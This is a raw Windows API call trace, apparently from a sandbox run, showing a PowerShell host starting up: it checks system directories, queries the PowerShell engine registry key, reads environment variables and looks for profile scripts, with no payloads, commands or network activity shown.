	[0658.347] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16cf90 | out: lpFileInformation=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0658.347] SetErrorMode (uMode=0x1) returned 0x1
	[0658.347] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0658.348] SetErrorMode (uMode=0x1) returned 0x1
	[0658.348] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16cf90 | out: lpFileInformation=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0658.348] SetErrorMode (uMode=0x1) returned 0x1
	[0658.348] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0658.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x16cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0658.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0658.348] SetErrorMode (uMode=0x1) returned 0x1
	[0658.349] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16cf90 | out: lpFileInformation=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0658.349] SetErrorMode (uMode=0x1) returned 0x1
	[0658.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0658.349] SetErrorMode (uMode=0x1) returned 0x1
	[0658.349] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16cf90 | out: lpFileInformation=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0658.349] SetErrorMode (uMode=0x1) returned 0x1
	[0658.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0658.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x16cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0658.350] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0658.350] SetErrorMode (uMode=0x1) returned 0x1
	[0658.350] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16cfd0 | out: lpFileInformation=0x16cfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0658.350] SetErrorMode (uMode=0x1) returned 0x1
	[0658.350] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0658.350] SetErrorMode (uMode=0x1) returned 0x1
	[0658.350] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16cfd0 | out: lpFileInformation=0x16cfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0658.351] SetErrorMode (uMode=0x1) returned 0x1
	[0658.351] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0658.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x16ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0658.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0658.351] SetErrorMode (uMode=0x1) returned 0x1
	[0658.351] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16cfd0 | out: lpFileInformation=0x16cfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0658.351] SetErrorMode (uMode=0x1) returned 0x1
	[0658.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0658.351] SetErrorMode (uMode=0x1) returned 0x1
	[0658.352] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16cfd0 | out: lpFileInformation=0x16cfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0658.352] SetErrorMode (uMode=0x1) returned 0x1
	[0658.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0658.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x16ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0658.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0658.355] SetErrorMode (uMode=0x1) returned 0x1
	[0658.355] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d290 | out: lpFileInformation=0x16d290*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0658.355] SetErrorMode (uMode=0x1) returned 0x1
	[0658.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0658.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0658.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0658.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0660.161] CoTaskMemAlloc (cb=0x804) returned 0x1b880b60
	[0660.161] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b880b60, nSize=0x16d5f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d5f8) returned 0x1
	[0660.161] CoTaskMemFree (pv=0x1b880b60) 
	[0660.161] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0660.161] GetUserNameW (in: lpBuffer=0x1f1ef0, pcbBuffer=0x16d638 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d638) returned 1
	[0660.162] CoTaskMemFree (pv=0x1f1ef0) 
	[0660.162] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f8f7e8*="Available", lpRawData=0x2f8f578) returned 1
	[0661.561] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0661.561] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.561] CoTaskMemFree (pv=0x1a9d20) 
	[0661.562] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0661.562] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.562] CoTaskMemFree (pv=0x1a9d20) 
	[0661.564] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0661.564] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0661.564] CoTaskMemFree (pv=0x1a9d20) 
	[0661.564] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0661.564] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0661.564] CoTaskMemFree (pv=0x1a9d20) 
	[0661.566] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x380) returned 0x0
	[0661.567] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d59c, lpData=0x0, lpcbData=0x16d598*=0x0 | out: lpType=0x16d59c*=0x1, lpData=0x0, lpcbData=0x16d598*=0x56) returned 0x0
	[0661.567] CoTaskMemAlloc (cb=0x5a) returned 0x1b86ff90
	[0661.567] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d56c, lpData=0x1b86ff90, lpcbData=0x16d568*=0x56 | out: lpType=0x16d56c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d568*=0x56) returned 0x0
	[0661.567] CoTaskMemFree (pv=0x1b86ff90) 
	[0661.567] RegCloseKey (hKey=0x380) returned 0x0
	[0661.568] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0661.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.568] CoTaskMemFree (pv=0x1a9d20) 
	[0661.582] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0661.582] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.582] CoTaskMemFree (pv=0x1a9d20) 
	[0661.590] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0661.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.590] CoTaskMemFree (pv=0x1a9d20) 
	[0661.590] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0661.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.590] CoTaskMemFree (pv=0x1a9d20) 
	[0661.591] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0661.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.591] CoTaskMemFree (pv=0x1a9d20) 
	[0661.592] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0661.592] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.592] CoTaskMemFree (pv=0x1a9d20) 
	[0661.593] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0661.593] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.594] CoTaskMemFree (pv=0x1a9d20) 
	[0661.594] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0661.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.594] CoTaskMemFree (pv=0x1a9d20) 
	[0663.279] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0663.279] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0663.279] CoTaskMemFree (pv=0x1a9d20) 
	[0666.754] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1aa160
	[0666.756] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1aa270
	[0673.445] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0673.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0673.445] CoTaskMemFree (pv=0x1aa380) 
	[0673.449] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0673.449] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0673.449] CoTaskMemFree (pv=0x1aa380) 
	[0673.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0673.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0673.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0673.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0675.170] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d778 | out: phkResult=0x16d778*=0x38c) returned 0x0
	[0675.171] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d6fc, lpData=0x0, lpcbData=0x16d6f8*=0x0 | out: lpType=0x16d6fc*=0x1, lpData=0x0, lpcbData=0x16d6f8*=0x56) returned 0x0
	[0675.171] CoTaskMemAlloc (cb=0x5a) returned 0x1b8866a0
	[0675.171] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d6cc, lpData=0x1b8866a0, lpcbData=0x16d6c8*=0x56 | out: lpType=0x16d6cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d6c8*=0x56) returned 0x0
	[0676.750] CoTaskMemFree (pv=0x1b8866a0) 
	[0676.751] RegCloseKey (hKey=0x38c) returned 0x0
	[0676.751] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d778 | out: phkResult=0x16d778*=0x38c) returned 0x0
	[0676.751] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d6fc, lpData=0x0, lpcbData=0x16d6f8*=0x0 | out: lpType=0x16d6fc*=0x1, lpData=0x0, lpcbData=0x16d6f8*=0x56) returned 0x0
	[0676.751] CoTaskMemAlloc (cb=0x5a) returned 0x1b8866a0
	[0676.751] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d6cc, lpData=0x1b8866a0, lpcbData=0x16d6c8*=0x56 | out: lpType=0x16d6cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d6c8*=0x56) returned 0x0
	[0676.751] CoTaskMemFree (pv=0x1b8866a0) 
	[0676.751] RegCloseKey (hKey=0x38c) returned 0x0
	[0676.751] CoTaskMemAlloc (cb=0x20c) returned 0x1b857970
	[0676.752] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b857970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0676.752] CoTaskMemFree (pv=0x1b857970) 
	[0676.752] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d330, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0676.752] CoTaskMemAlloc (cb=0x20c) returned 0x1b857970
	[0676.752] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b857970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0676.752] CoTaskMemFree (pv=0x1b857970) 
	[0676.752] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d330, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0676.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0676.753] SetErrorMode (uMode=0x1) returned 0x1
	[0676.753] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d6e0 | out: lpFileInformation=0x16d6e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0676.753] SetErrorMode (uMode=0x1) returned 0x1
	[0676.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0676.753] SetErrorMode (uMode=0x1) returned 0x1
	[0676.754] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d6e0 | out: lpFileInformation=0x16d6e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0676.754] SetErrorMode (uMode=0x1) returned 0x1
	[0676.754] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0676.754] SetErrorMode (uMode=0x1) returned 0x1
	[0676.754] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d6e0 | out: lpFileInformation=0x16d6e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0676.754] SetErrorMode (uMode=0x1) returned 0x1
	[0676.754] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0676.754] SetErrorMode (uMode=0x1) returned 0x1
	[0676.754] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d6e0 | out: lpFileInformation=0x16d6e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0676.755] SetErrorMode (uMode=0x1) returned 0x1
	[0676.755] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0676.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.755] CoTaskMemFree (pv=0x1aa380) 
	[0676.756] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0676.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.756] CoTaskMemFree (pv=0x1aa380) 
	[0676.756] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0676.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.756] CoTaskMemFree (pv=0x1aa380) 
	[0676.757] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0676.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.757] CoTaskMemFree (pv=0x1aa380) 
	[0676.758] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0676.758] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.758] CoTaskMemFree (pv=0x1aa380) 
